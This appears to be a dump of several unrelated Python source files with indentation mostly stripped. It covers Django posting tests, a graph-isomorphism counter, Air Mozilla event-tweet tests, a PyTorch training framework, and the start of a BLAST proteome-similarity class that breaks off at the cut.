self.assertEqual(resp.status_code, 302)
self.assertEqual(resp.url, "/")
# Create an authenticated session
self.client.login(username="username", password="password")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertTemplateUsed(resp, "new.html")
# Context Variables
channels = str(Channel.objects.all())
self.assertEqual(resp.context["metatype"], "question")
self.assertEqual(str(resp.context["channels"]), channels)
self.assertIsInstance(resp.context["form"], post_form)
def test_discuss(self):
url = reverse('discuss')
expected_url = "/new/discuss"
self.assertEqual(url, expected_url)
resp = self.client.get(url)
# Should redirect to home if not logged in
self.assertEqual(resp.status_code, 302)
self.assertEqual(resp.url, "/")
# Create an authenticated session
self.client.login(username="username", password="password")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertTemplateUsed(resp, "new.html")
# Context Variables
channels = str(Channel.objects.all())
self.assertEqual(resp.context["metatype"], "discussion")
self.assertEqual(str(resp.context["channels"]), channels)
self.assertIsInstance(resp.context["form"], post_form)
def test_submit_get(self):
url = self.purl_ques
# Should redirect to home in both cases
# 1) not logged in
resp = self.client.get(url)
self.assertRedirects(resp, "/")
# 2) logged in
self.client.login(username="username", password="password")
resp = self.client.get(url)
self.assertRedirects(resp, "/")
def test_submit_post_without_login(self):
url = self.purl_ques
# Posts without auth must redirect to home
resp = self.client.post(url, {})
self.assertRedirects(resp, "/")
def test_submit_simple_posts(self):
url = self.purl_ques
title = "Testing question posting"
desc = "Description of our test question."
simpledata = {
"title": title,
"description": desc,
"channels": ""
}
self.client.login(username="username", password="password")
q = Question.objects.all()
self.assertEqual(len(q), 0)
# Follow = True makes the client grab the redirected url too.
resp = self.client.post(url, simpledata, follow=True)
self.assertEqual(resp.status_code, 200)
# Tests for the newly created question.
q = Question.objects.all()
self.assertEqual(len(q), 1)
self.assertEqual(q[0].title, title)
self.assertEqual(q[0].description, desc)
self.assertEqual(q[0].channels.count(), 0)
self.assertEqual(q[0].metatype, "question")
self.assertEqual(q[0].author, "username")
# Test for posting of a discussion
url = self.purl_disc
resp = self.client.post(url, simpledata, follow=True)
self.assertEqual(resp.status_code, 200)
q = Question.objects.all()
self.assertEqual(len(q), 2)
self.assertEqual(q[1].metatype, "discussion")
def test_submit_post_with_channels(self):
url = self.purl_ques
title = "Testing post posting"
desc = "Description of our test question with channels."
simpledata = {
"title": title,
"description": desc,
"channels": ["1"]
}
self.client.login(username="username", password="password")
# resp = self.client.post(url, simpledata, follow=True)
# self.assertEqual(resp.status_code, 200)
# q = Question.objects.first()
# c = Channel.objects.get(name="testing1")
# self.assertEqual(len(Question.objects.all()), 1)
# self.assertEqual(q.title, title)
# self.assertEqual(q.channels.count(), 1)
# self.assertEqual(q.channels.all()[0], c)
# Test for posting of a discussion
url = self.purl_disc
simpledata["channels"] = ["2"]
# resp = self.client.post(url, simpledata, follow=True)
# self.assertEqual(resp.status_code, 200)
# q = Question.objects.last()
# c = str(Channel.objects.all())
# self.assertEqual(q.metatype, "discussion")
# self.assertEqual(q.channels.count(), 1)
# self.assertEqual(str(q.channels.all()), c)
def test_submit_post_with_errors(self):
url = self.purl_ques
simpledata = {
"title": "",
"description": "",
"channels": ""
}
        # We aren't doing any server-side error processing in the post model.
        # This isn't a serious problem since errors are checked on the frontend,
        # but if JavaScript is disabled or someone submits an empty post,
        # the server will respond with a 500.
|
1696630
|
from ...scheme import Scheme
from ..schemeinfo import SchemeInfoDialog
from ...gui import test
class TestSchemeInfo(test.QAppTestCase):
def test_scheme_info(self):
scheme = Scheme(title="A Scheme", description="A String\n")
dialog = SchemeInfoDialog()
dialog.setScheme(scheme)
status = dialog.exec_()
if status == dialog.Accepted:
self.assertEqual(
scheme.title.strip(), str(dialog.editor.name_edit.text()).strip()
)
self.assertEqual(
scheme.description, str(dialog.editor.desc_edit.toPlainText()).strip()
)
|
1696649
|
from ..filters import run_filters, cheap_filters, all_filters
from ..utils.misc import invert, values_map_to_same_key, one_hot
from ..utils.graph_ops import get_node_cover
from .alldiffs import count_alldiffs
import numpy as np
from functools import reduce
# TODO: count how many isomorphisms each background node participates in.
# TODO: switch from recursive to iterative implementation for readability
n_iterations = 0
def recursive_isomorphism_counter(tmplt, world, candidates, *,
unspec_cover, verbose, init_changed_cands, count_iterations=False):
global n_iterations
n_iterations += 1
# If the node cover is empty, the unspec nodes are disconnected. Thus, we
# can skip straight to counting solutions to the alldiff constraint problem
if len(unspec_cover) == 0:
# Elimination filter is not needed here and would be a waste of time
tmplt, world, candidates = run_filters(tmplt, world, candidates=candidates, filters=cheap_filters,
verbose=False, init_changed_cands=init_changed_cands)
node_to_cands = {node: world.nodes[candidates[idx]]
for idx, node in enumerate(tmplt.nodes)}
return count_alldiffs(node_to_cands)
tmplt, world, candidates = run_filters(tmplt, world, candidates=candidates, filters=all_filters,
verbose=False, init_changed_cands=init_changed_cands)
# Since the node cover is not empty, we first choose some valid
# assignment of the unspecified nodes one at a time until the remaining
# unspecified nodes are disconnected.
n_isomorphisms = 0
node_idx = unspec_cover[0]
cand_idxs = np.argwhere(candidates[node_idx]).flat
for i, cand_idx in enumerate(cand_idxs):
candidates_copy = candidates.copy()
candidates_copy[node_idx] = one_hot(cand_idx, world.n_nodes)
# recurse to make assignment for the next node in the unspecified cover
n_isomorphisms += recursive_isomorphism_counter(
tmplt, world, candidates_copy, unspec_cover=unspec_cover[1:],
verbose=verbose, init_changed_cands=one_hot(node_idx, tmplt.n_nodes), count_iterations=count_iterations)
# TODO: more useful progress summary
if verbose:
print("depth {}: {} of {}".format(len(unspec_cover), i, len(cand_idxs)), n_isomorphisms)
return n_isomorphisms
def count_isomorphisms(tmplt, world, *, candidates=None, verbose=True, count_iterations=False):
"""
    Counts the number of ways to assign template nodes to world nodes such that
edges between template nodes also appear between the corresponding world
nodes. Does not factor in the number of ways to assign the edges. Only
counts the number of assignments between nodes.
    If the set of unspecified template nodes is too large or too densely
connected, this code may never finish.
"""
global n_iterations
n_iterations = 0
    if candidates is None:
        tmplt, world, candidates = run_filters(
            tmplt, world, filters=all_filters, verbose=verbose)
unspec_nodes = np.where(candidates.sum(axis=1) > 1)[0]
tmplt_subgraph = tmplt.subgraph(unspec_nodes)
unspec_cover = get_node_cover(tmplt_subgraph)
unspec_cover_nodes = [tmplt_subgraph.nodes[node_idx] for node_idx in unspec_cover]
unspec_cover_idxes = [tmplt.node_idxs[node] for node in unspec_cover_nodes]
# Send zeros to init_changed_cands since we already just ran the filters
count = recursive_isomorphism_counter(
tmplt, world, candidates, verbose=verbose, unspec_cover=unspec_cover_idxes,
        init_changed_cands=np.zeros(tmplt.nodes.shape, dtype=bool), count_iterations=count_iterations)
if count_iterations:
return count, n_iterations
else:
return count
def recursive_isomorphism_finder(tmplt, world, candidates, *,
unspec_node_idxs, verbose, init_changed_cands,
found_isomorphisms):
if len(unspec_node_idxs) == 0:
# All nodes have been assigned, add the isomorphism to the list
new_isomorphism = {}
for tmplt_idx, tmplt_node in enumerate(tmplt.nodes):
if verbose:
print(str(tmplt_node)+":", world.nodes[candidates[tmplt_idx]])
new_isomorphism[tmplt_node] = world.nodes[candidates[tmplt_idx]][0]
found_isomorphisms.append(new_isomorphism)
return found_isomorphisms
tmplt, world, candidates = run_filters(tmplt, world, candidates=candidates,
filters=all_filters, verbose=False,
init_changed_cands=init_changed_cands)
node_idx = unspec_node_idxs[0]
cand_idxs = np.argwhere(candidates[node_idx]).flat
for i, cand_idx in enumerate(cand_idxs):
candidates_copy = candidates.copy()
candidates_copy[node_idx] = one_hot(cand_idx, world.n_nodes)
# recurse to make assignment for the next node in the unspecified cover
recursive_isomorphism_finder(
tmplt, world, candidates_copy,
unspec_node_idxs=unspec_node_idxs[1:],
verbose=verbose,
init_changed_cands=one_hot(node_idx, tmplt.n_nodes),
found_isomorphisms=found_isomorphisms)
return found_isomorphisms
def find_isomorphisms(tmplt, world, *, candidates=None, verbose=True):
""" Returns a list of isomorphisms as dictionaries mapping template nodes to
world nodes. Note: this is much slower than counting, and should only be
done for small numbers of isomorphisms and fully filtered candidate matrices
"""
    if candidates is None:
        tmplt, world, candidates = run_filters(
            tmplt, world, filters=all_filters, verbose=verbose)
unspec_node_idxs = np.where(candidates.sum(axis=1) > 1)[0]
found_isomorphisms = []
return recursive_isomorphism_finder(
tmplt, world, candidates, verbose=verbose,
unspec_node_idxs=unspec_node_idxs,
        init_changed_cands=np.zeros(tmplt.nodes.shape, dtype=bool),
found_isomorphisms=found_isomorphisms)
def print_isomorphisms(tmplt, world, *, candidates=None, verbose=True):
""" Prints the list of isomorphisms """
print(find_isomorphisms(tmplt, world, candidates=candidates,
verbose=verbose))
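# Illustrative sketch (assumes `tmplt` and `world` are the graph objects
# run_filters expects):
#
# count, iters = count_isomorphisms(tmplt, world, verbose=False,
#                                   count_iterations=True)
# print('{} isomorphisms in {} recursive calls'.format(count, iters))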
|
1696664
|
import datetime
import json
from nose.tools import eq_, ok_
import mock
from django.conf import settings
from django.contrib.auth.models import Group
from django.utils import timezone
from django.core.urlresolvers import reverse
from airmozilla.main.models import (
Event,
EventTweet,
Location,
Approval
)
from .base import ManageTestCase
from airmozilla.base.tests.test_utils import Response
class TestEventTweets(ManageTestCase):
event_base_data = {
'status': Event.STATUS_SCHEDULED,
'description': '...',
'privacy': 'public',
'location': '1',
'channels': '1',
'tags': 'xxx',
'template': '1',
'start_time': '2012-3-4 12:00',
'estimated_duration': '3600',
'timezone': 'US/Pacific'
}
placeholder = 'airmozilla/manage/tests/firefox.png'
@mock.patch('requests.get')
def test_prepare_new_tweet(self, rget):
def mocked_read(url, params):
assert url == settings.BITLY_URL
return Response({
u'status_code': 200,
u'data': {
u'url': u'http://mzl.la/1adh2wT',
u'hash': u'1adh2wT',
u'global_hash': u'1adh2wU',
u'long_url': u'https://air.mozilla.org/it-buildout/',
u'new_hash': 0
},
u'status_txt': u'OK'
})
rget.side_effect = mocked_read
event = Event.objects.get(title='Test event')
# the event must have a real placeholder image
with open(self.placeholder) as fp:
response = self.client.post(
reverse('manage:event_edit', args=(event.pk,)),
dict(self.event_base_data,
title=event.title,
short_description="Check out <b>This!</b>",
description="Something longer",
placeholder_img=fp)
)
assert response.status_code == 302, response.status_code
# on the edit page, there should be a link
response = self.client.get(
reverse('manage:event_edit', args=(event.pk,))
)
assert response.status_code == 200
url = reverse('manage:new_event_tweet', args=(event.pk,))
ok_(url in response.content)
response = self.client.get(url)
eq_(response.status_code, 200)
textarea = (
response.content
.split('<textarea')[1]
.split('>')[1]
.split('</textarea')[0]
)
ok_(textarea.strip().startswith('Check out This!'))
event = Event.objects.get(pk=event.pk)
event_url = 'http://testserver'
event_url += reverse('main:event', args=(event.slug,))
ok_('http://mzl.la/1adh2wT' in textarea)
ok_(event_url not in textarea)
# Sometimes, due to...
# https://bugzilla.mozilla.org/show_bug.cgi?id=1167211
# the session is cleared out here in this test, so we
# really make sure we're signed in
assert self.client.login(username='fake', password='<PASSWORD>')
assert self.client.session.items()
# load the form
response = self.client.get(url)
eq_(response.status_code, 200)
# try to submit it with longer than 140 characters
response = self.client.post(url, {
'text': 'x' * 141,
'include_placeholder': True,
})
eq_(response.status_code, 200)
assert not EventTweet.objects.all().count()
ok_('it has 141' in response.content)
# try again
response = self.client.post(url, {
'text': 'Bla bla #tag',
'include_placeholder': True,
})
eq_(response.status_code, 302)
ok_(EventTweet.objects.all().count())
now = timezone.now()
event_tweet, = EventTweet.objects.all()
# To avoid being unlucky about the second ticking over
# just before we compare these, make it OK to be up to 2 seconds
# apart.
diff = abs(event_tweet.send_date - now)
ok_(diff < datetime.timedelta(seconds=2))
ok_(not event_tweet.sent_date)
ok_(not event_tweet.error)
ok_(not event_tweet.tweet_id)
@mock.patch('requests.get')
def test_prepare_new_tweet_on_future_event(self, rget):
def mocked_read(url, params):
assert url == settings.BITLY_URL
return Response({
u'status_code': 200,
u'data': {
u'url': u'http://mzl.la/1adh2wT',
u'hash': u'1adh2wT',
u'global_hash': u'1adh2wU',
u'long_url': u'https://air.mozilla.org/it-buildout/',
u'new_hash': 0
},
u'status_txt': u'OK'
})
rget.side_effect = mocked_read
event = Event.objects.get(title='Test event')
event.start_time = timezone.now() + datetime.timedelta(days=10)
event.save()
assert event.is_scheduled()
assert event.location
assert event.location.timezone
# on the edit page, there should be a link
url = reverse('manage:new_event_tweet', args=(event.pk,))
response = self.client.get(url)
eq_(response.status_code, 200)
help_text_part = 'This event starts %s' % (
event.location_time.strftime('%Y-%m-%d %H:%M')
)
ok_(help_text_part in response.content)
def test_edit_event_tweet(self):
event = Event.objects.get(title='Test event')
assert event.location and event.location.timezone == 'US/Pacific'
tomorrow = timezone.now() + datetime.timedelta(days=1)
tweet = EventTweet.objects.create(
event=event,
text='Something something',
creator=self.user,
include_placeholder=True,
send_date=tomorrow,
)
url = reverse('manage:edit_event_tweet', args=(event.id, tweet.id))
response = self.client.get(url)
eq_(response.status_code, 200)
ok_('Something something' in response.content)
# tz = pytz.timezone(event.location.timezone)
data = {
'text': 'Different Bla ',
'include_placeholder': True,
'send_date': tweet.send_date.strftime('%Y-%m-%d %H:%M'),
}
response = self.client.post(url, data)
eq_(response.status_code, 302)
tweet = EventTweet.objects.get(id=tweet.id)
eq_(tweet.text, 'Different Bla')
        # because of rounding they won't be exactly equal, but they will be close
ok_(abs(tomorrow - tweet.send_date) <= datetime.timedelta(hours=1))
def test_event_tweets_empty(self):
event = Event.objects.get(title='Test event')
url = reverse('manage:event_tweets', args=(event.pk,))
response = self.client.get(url)
eq_(response.status_code, 200)
def test_event_tweets_states(self):
event = Event.objects.get(title='Test event')
assert event in Event.objects.approved()
group = Group.objects.create(name='testapprover')
Approval.objects.create(
event=event,
group=group,
)
assert event not in Event.objects.approved()
url = reverse('manage:event_tweets', args=(event.pk,))
response = self.client.get(url)
eq_(response.status_code, 200)
tweet = EventTweet.objects.create(
event=event,
text='Bla bla',
send_date=timezone.now(),
)
response = self.client.get(url)
eq_(response.status_code, 200)
ok_('Bla bla' in response.content)
ok_('Needs to be approved first' in response.content)
from airmozilla.main.templatetags.jinja_helpers import js_date
ok_(
js_date(tweet.send_date.replace(microsecond=0))
not in response.content
)
# also check that 'Bla bla' is shown on the Edit Event page
edit_url = reverse('manage:event_edit', args=(event.pk,))
response = self.client.get(edit_url)
eq_(response.status_code, 200)
ok_('Bla bla' in response.content)
tweet.tweet_id = '1234567890'
tweet.sent_date = (
timezone.now() -
datetime.timedelta(days=1)
)
tweet.save()
response = self.client.get(url)
eq_(response.status_code, 200)
ok_('Bla bla' in response.content)
ok_(
'https://twitter.com/%s/status/1234567890'
% settings.TWITTER_USERNAME
in response.content
)
ok_(
js_date(tweet.sent_date.replace(microsecond=0))
in response.content
)
tweet.tweet_id = None
tweet.error = "Some error"
tweet.save()
response = self.client.get(url)
eq_(response.status_code, 200)
ok_('Bla bla' in response.content)
ok_(
'https://twitter.com/%s/status/1234567890'
% settings.TWITTER_USERNAME
not in response.content
)
ok_(
js_date(tweet.sent_date.replace(microsecond=0))
in response.content
)
ok_('Failed to send' in response.content)
def test_all_event_tweets_states(self):
event = Event.objects.get(title='Test event')
assert event in Event.objects.approved()
group = Group.objects.create(name='testapprover')
Approval.objects.create(
event=event,
group=group,
)
assert event not in Event.objects.approved()
url = reverse('manage:all_event_tweets_data')
response = self.client.get(url)
eq_(response.status_code, 200)
tweet = EventTweet.objects.create(
event=event,
text='Bla bla',
send_date=timezone.now(),
)
response = self.client.get(url)
eq_(response.status_code, 200)
data = json.loads(response.content)
first_tweet, = data['tweets']
eq_(first_tweet['text'], 'Bla bla')
ok_(first_tweet['event']['_needs_approval'])
# also check that 'Bla bla' is shown on the Edit Event page
edit_url = reverse('manage:event_edit', args=(event.pk,))
response = self.client.get(edit_url)
eq_(response.status_code, 200)
ok_('Bla bla' in response.content)
tweet.tweet_id = '1234567890'
tweet.sent_date = timezone.now() - datetime.timedelta(days=1)
tweet.save()
response = self.client.get(url)
eq_(response.status_code, 200)
data = json.loads(response.content)
first_tweet, = data['tweets']
tweet_url = (
'https://twitter.com/%s/status/1234567890'
% settings.TWITTER_USERNAME
)
eq_(first_tweet['full_tweet_url'], tweet_url)
tweet.tweet_id = None
tweet.error = "Some error"
tweet.save()
response = self.client.get(url)
eq_(response.status_code, 200)
data = json.loads(response.content)
first_tweet, = data['tweets']
ok_('full_tweet_url' not in first_tweet)
ok_('creator' not in first_tweet)
assert self.user.email
tweet.creator = self.user
tweet.save()
response = self.client.get(url)
eq_(response.status_code, 200)
data = json.loads(response.content)
first_tweet, = data['tweets']
eq_(first_tweet['creator'], {'email': self.user.email})
@mock.patch('airmozilla.manage.views.events.send_tweet')
def test_force_send_now(self, mocked_send_tweet):
event = Event.objects.get(title='Test event')
tweet = EventTweet.objects.create(
event=event,
text='Bla bla',
send_date=timezone.now(),
)
def mock_send_tweet(event_tweet):
event_tweet.tweet_id = '1234567890'
event_tweet.save()
mocked_send_tweet.side_effect = mock_send_tweet
url = reverse('manage:event_tweets', args=(event.pk,))
response = self.client.post(url, {
'send': tweet.pk,
})
eq_(response.status_code, 302)
tweet = EventTweet.objects.get(pk=tweet.pk)
eq_(tweet.tweet_id, '1234567890')
def test_view_tweet_error(self):
event = Event.objects.get(title='Test event')
tweet = EventTweet.objects.create(
event=event,
text='Bla bla',
send_date=timezone.now(),
error='Crap!'
)
url = reverse('manage:event_tweets', args=(event.pk,))
response = self.client.post(url, {
'error': tweet.pk,
})
eq_(response.status_code, 200)
eq_(response['content-type'], 'text/plain')
ok_('Crap!' in response.content)
def test_cancel_event_tweet(self):
event = Event.objects.get(title='Test event')
tweet = EventTweet.objects.create(
event=event,
text='Bla bla',
send_date=timezone.now(),
)
url = reverse('manage:event_tweets', args=(event.pk,))
response = self.client.post(url, {
'cancel': tweet.pk,
})
eq_(response.status_code, 302)
ok_(not EventTweet.objects.all().count())
def test_create_event_tweet_with_location_timezone(self):
event = Event.objects.get(title='Test event')
event.location = Location.objects.create(
name='Paris',
timezone='Europe/Paris'
)
event.save()
# the event must have a real placeholder image
with open(self.placeholder) as fp:
response = self.client.post(
reverse('manage:event_edit', args=(event.pk,)),
dict(self.event_base_data,
title=event.title,
short_description="Check out <b>This!</b>",
description="Something longer",
placeholder_img=fp)
)
assert response.status_code == 302, response.status_code
url = reverse('manage:new_event_tweet', args=(event.pk,))
now = datetime.datetime.utcnow()
response = self.client.post(url, {
'text': 'Bla bla #tag',
'include_placeholder': True,
'send_date': now.strftime('%Y-%m-%d 12:00'),
})
eq_(response.status_code, 302)
event_tweet, = EventTweet.objects.all()
# we specified it as noon in Paris, but the save time
# will be UTC
ok_(event_tweet.send_date.hour != 12)
assert event_tweet.send_date.strftime('%Z') == 'UTC'
|
1696679
|
from torch import optim
from contextlib import contextmanager
class Trainer:
r"""Abstract base class for training models.
    The Trainer class makes it incredibly simple and convenient to train,
    monitor, debug and checkpoint entire Deep Learning projects.
Simply define your training loop by
implementing the :py:meth:`optimize` method.
Args:
models (list of :py:class:`nn.Module`): All the models that need
to be trained
optimizers (list of :py:class:`optim.Optimizer`): Any optimizers that
are used
.. note::
        If any model is in eval() mode, the trainer is *switched off*.
        This means that, as per protocol, *none* of the models will train.
Attributes:
callbacks (list): A list of callbacks attached to the trainer.
Take a look at :py:class:`SupervisedTrainer` for an idea on how to extend this class.
"""
def __init__(self, models, optimizers):
self.models = models
self.optimizers = optimizers
self.parameters = set()
self.register_parameter('iterations', 0)
def optimize(self):
r""" Defines the core optimization loop.
This method is called on each iteration.
Two quick protocols that one needs to follow are:
1. **Do NOT** actually backpropagate or step() the optimizers if the
trainer is not training. Use the :py:meth:`is_training` method
to find out.
This is essential since this will ensure that the trainer behaves
as expected when :py:meth:`is_training` is ``False``.
Useful, for example, in cases like :py:class:`callbacks.ColdStart`
2. Send a callback the signal ``'gradient'`` with a keyword argument
``'models'`` that is the list of models that accumulate a gradient.
        Usually, it's all the models (``self.models``).
Any callbacks that listen to this signal are interested in the gradient
information (eg. ``callbacks.Babysitter``).
"""
raise NotImplementedError
def train(self, dataloader, epochs=1, callbacks=None, **kwargs):
r"""Starts the training process.
Args:
dataloader (``DataLoader``): The MagNet dataloader that iterates
over the training set
epochs (float or int): The number of epochs to train for.
Default: ``1``
callbacks (list): Any callbacks to be attached. Default: ``None``
Keyword Args:
iterations (int): The number of iterations to train for.
Overrides :attr:`epochs`.
.. note::
PyTorch ``DataLoader`` s are not supported.
Ideally, encapsulate your dataset in the ``Data`` class.
"""
from magnet.training.callbacks import CallbackQueue
self.dataloader = dataloader
if callbacks is None: callbacks = []
self.callbacks = CallbackQueue(callbacks)
total_iterations = kwargs.get('iterations', int(epochs * len(dataloader)))
self.callbacks('on_training_start', trainer=self, total_iterations=total_iterations)
for self.iterations in range(self.iterations, self.iterations + total_iterations): next(self)
self.callbacks('on_training_end', trainer=self)
def __iter__(self):
return self
def __next__(self):
self.callbacks('on_batch_start', trainer=self)
self.optimize()
self.callbacks('on_batch_end', trainer=self)
@contextmanager
def mock(self, path=None):
r"""A context manager that creates a temporary *'safe'* scope for training.
All impact to stateful objects (models, optimizers and the
trainer itself) are forgotten once out of this scope.
This is very useful if you need to try out *what-if experiments*.
Args:
path (pathlib.Path): The path to save temporary states into
Default: ``{System temp directory}/.mock_trainer``
"""
from shutil import rmtree
if path is None:
from pathlib import Path
from tempfile import gettempdir
path = Path(gettempdir()) / '.mock_trainer'
rmtree(path, ignore_errors=True) # Remove any existing directory
self.save_state(path)
try:
yield
finally:
self.load_state(path)
rmtree(path)
def epochs(self, mode=None):
r"""The number of epochs completed.
Args:
mode (str or None): If the mode is ``'start'`` or ``'end'``, a
boolean is returned signalling if it's the start or end of an epoch
"""
if mode is None:
return self.iterations / len(self.dataloader)
if mode == 'start':
return (self.iterations / len(self.dataloader)).is_integer()
if mode == 'end':
return ((self.iterations + 1) / len(self.dataloader)).is_integer()
def is_training(self):
return all(model.training for model in self.models)
def load_state(self, path):
from magnet.training.utils import load_state, load_object
for i, model in enumerate(self.models): load_state(model, path / 'models', alternative_name=str(i))
for i, optimizer in enumerate(self.optimizers): load_state(optimizer, path / 'optimizers', alternative_name=str(i))
state_dict = load_object(path / 'state.p', default={})
for attr, val in state_dict.items(): self.register_parameter(attr, val)
try: self.callbacks('load_state', trainer=self, path=path / 'callbacks')
except AttributeError: pass
try: self.dataloader.load_state_dict(path / 'dataloader.p')
except AttributeError: pass
def save_state(self, path):
from magnet.training.utils import save_state, save_object
for i, model in enumerate(self.models): save_state(model, path / 'models', alternative_name=str(i))
for i, optimizer in enumerate(self.optimizers): save_state(optimizer, path / 'optimizers', alternative_name=str(i))
state_dict = {attr: getattr(self, attr) for attr in self.parameters}
save_object(state_dict, path / 'state.p')
try: self.callbacks('save_state', trainer=self, path=path / 'callbacks')
except AttributeError: pass
try: self.dataloader.save_state_dict(path / 'dataloader.p')
except AttributeError: pass
def register_parameter(self, name, value):
r"""Use this to register *'stateful'* parameters that are serialized
"""
setattr(self, name, value)
self.parameters.add(name)
class SupervisedTrainer(Trainer):
r"""A simple trainer that implements a supervised approach where a simple
model :math:`\hat{y} = f(x)` is trained to map :math:`\hat{y}` to
ground-truth :math:`y` according to some specified loss.
This is the training routine that most high-level deep learning frameworks
implement.
Args:
model (``nn.Module``): The model that needs to be trained
        optimizer (str or optim.Optimizer): The optimizer used to train
the model. Default: ``'adam'``
loss (str or ``callable``): A loss function that gives the objective
to be minimized. Default: ``'cross_entropy'``
metrics (list): Any other metrics that need to be monitored.
Default: ``None``
* :attr:`optimizer` can be an actual ``optim.Optimizer`` instance or the
      name of a popular optimizer (e.g. ``'adam'``).
* :attr:`loss` can be a function or the name of a popular
loss function (eg. ``'cross_entropy'``).
It should accept 2 arguments (:math:`\hat{y}`, :math:`y`).
* :attr:`metrics` should contain a list of functions which accept
2 arguments (:math:`\hat{y}`, :math:`y`), like the loss function.
.. note::
A static :py:meth:`validate` function is provided for the
validation callback
.. note::
The :attr:`metrics` is of no use unless there is some
callback (eg.``callbacks.Monitor``) to receive the metrics
Examples::
>>> import magnet as mag
>>> import magnet.nodes as mn
>>> from magnet.data import Data
>>> from magnet.training import callbacks, SupervisedTrainer
>>> data = Data.get('mnist')
>>> model = mn.Linear(10, act=None)
>>> model.build(x=next(data())[0])
>>> trainer = SupervisedTrainer(model)
>>> callbacks=[callbacks.Monitor(),
callbacks.Validate(data(64, mode='val'), SupervisedTrainer.validate)]
>>> trainer.train(data(64, shuffle=True), 1, callbacks)
"""
def __init__(self, model, optimizer='adam', loss='cross_entropy', metrics=None):
from magnet.nodes.functional import wiki
if isinstance(optimizer, str): optimizer = optimizer_wiki[optimizer.lower()](model.parameters())
if isinstance(loss, str): loss = wiki['losses'][loss.lower()]
if metrics is None: metrics = []
if not isinstance(metrics, (tuple, list)): metrics = [metrics]
for i, metric in enumerate(metrics):
if isinstance(metric, str): metrics[i] = (metric, wiki['metrics'][metric.lower()])
super().__init__([model], [optimizer])
self.loss = loss
self.metrics = metrics
def optimize(self):
optimizer = self.optimizers[0]
loss = self.get_loss(self.dataloader)
# Protocol 1: Backprop and step() only if trainer is training
if self.is_training():
loss.backward()
# Protocol 2: Broadcast the models that accumulate the gradient
# using signal 'gradient' before clearing them.
self.callbacks('gradient', trainer=self, models=self.models)
optimizer.step()
optimizer.zero_grad()
@staticmethod
def validate(trainer, dataloader):
r"""Static helper method to validate models in :attr:`trainer` against
data in :attr:`dataloader`.
Can be passed to ``callbacks.Validate()``.
"""
trainer.get_loss(dataloader, validation=True)
def get_loss(self, dataloader, validation=False):
r"""Utility function that returns the loss and broadcasts metrics.
"""
def write_stats(key, value):
self.callbacks('write_stats', trainer=self, key=key, value=value, validation=validation, buffer_size=len(dataloader))
model = self.models[0]
x, y = next(dataloader)
y_pred = model(x)
loss = self.loss(y_pred, y)
# Broadcast the loss and any other metrics using the 'write_stats' signal.
write_stats('loss', loss.item())
for metric in self.metrics: write_stats(metric[0], metric[1](y_pred, y).item())
return loss
def finish_training(path, names=None):
r""" A helper function for cleaning up the training logs and other
checkpoints and retaining only the state_dicts of the trained models.
Args:
path (pathlib.Path): The path where the trainer was checkpointed
names (list): The names of the models in the order given to the trainer.
Default: ``None``
* :attr:`names` can be used if the models themselves did not have names
prior to training.
The checkpoints default to an ordered naming scheme.
If passed, the files are additionally renamed to these names.
.. note::
Does nothing / fails silently if the path does not exist.
Example::
>>> # Assume that we've defined two models - encoder and decoder,
>>> # and a suitable trainer. The models do not have a 'name' attribute.
>>> trainer.save_state(checkpoint_path / 'my-trainer')
>>> # Suppose the checkpoint directory contains the following files:
>>> # my-trainer/
>>> # models/
>>> # 0.pt
>>> # 1.pt
>>> # callbacks/
>>> # monitor/
>>> # babysitter/
>>> # state.p
>>> finish_training(path, names=['encoder', 'decoder'])
>>> # Now the directory contains these files:
>>> # encoder.pt
>>> # decoder.pt
"""
if not path.exists(): return
import shutil
if isinstance(names, str): names = [names]
filenames = list((path / 'models').glob('*.pt'))
if names is None: names = [filename.stem for filename in filenames]
for name, filename in zip(names, filenames):
shutil.move(filename, path.parent / (name + '.pt'))
shutil.rmtree(path)
optimizer_wiki = {'adam': optim.Adam}
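# Illustrative sketch (assumes `trainer`, `dataloader` and `path` are set up
# as in the SupervisedTrainer docstring): experiment inside a mock() scope,
# then keep only the final weights.
#
# with trainer.mock():
#     trainer.train(dataloader, epochs=0.1)  # all changes are rolled back here
# trainer.train(dataloader, epochs=1)
# trainer.save_state(path / 'my-trainer')
# finish_training(path / 'my-trainer', names=['model'])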
|
1696733
|
import csv
from Bio.Blast import NCBIWWW
from Bio.Blast import NCBIXML
from Bio import SeqIO
import shutil
import re
import os
from collections import defaultdict
from time import sleep
class CalculateReferenceProteomeSimilarity:
def __init__(self, input_file, input_fasta, output_file, match_length=8, species='human', file_type='vcf'):
self.input_file = input_file
self.input_fasta = input_fasta
self.output_file = output_file
self.metric_file = "{}.reference_matches".format(output_file)
self.match_length = match_length
self.species = species
self.file_type = file_type
self.species_to_organism = {
'human': 'Homo sapiens',
'atlantic salmon': 'Salmo salar',
'black-headed spider monkey': 'Ateles fusciceps',
'blue monkey': 'Cercopithecus mitis',
'bonobo': 'Pan paniscus',
'bornean orangutan': 'Pongo pygmaeus',
'brown-mantled tamarin': 'Saguinus fuscicollis',
'chimpanzee': 'Pan troglodytes',
'common marmoset': 'Callithrix jacchus',
'common squirrel monkey': 'Saimiri sciureus',
'cottontop tamarin': 'Saguinus oedipus',
'cow': 'Bos taurus',
'crab-eating macaque': 'Macaca fascicularis',
'dog': 'Canis lupus familiaris',
"Geoffroy's tamarin": 'Saguinus geoffroyi',
'golden lion tamarin': 'Leontopithecus rosalia',
'gorilla': 'Gorilla gorilla',
'grivet': 'Chlorocebus aethiops',
'hamadryas baboon': 'Papio hamadryas',
'horse': 'Equus caballus',
'lar gibbon': 'Hylobates lar',
'mouse': 'Mus musculus',
'moustached tamarin': 'Saguinus mystax',
'olive baboon': 'Papio anubis',
'pig': 'Sus scrofa',
'rainbow trout': 'Oncorhynchus mykiss',
'rhesus macaque': 'Macaca mulatta',
'sheep': 'Ovis aries',
'southern pig-tailed macaque': 'Macaca nemestrina',
'stump-tailed macaque': 'Macaca arctoides',
'white-faced saki': 'Pithecia pithecia',
'white-fronted spider monkey': 'Ateles belzebuth',
'yellow baboon': 'Papio cynocephalus',
}
def reference_match_headers(self):
return [
'Reference Match',
]
def get_mt_peptides(self):
records = list(SeqIO.parse(self.input_fasta, "fasta"))
if self.file_type == 'vcf':
records_dict = {x.id.replace('MT.', ''): str(x.seq) for x in filter(lambda x: x.id.startswith('MT.'), records)}
else:
records_dict = {x.id: str(x.seq) for x in records}
return records_dict
def get_wt_peptides(self):
if self.file_type == 'vcf':
records = list(SeqIO.parse(self.input_fasta, "fasta"))
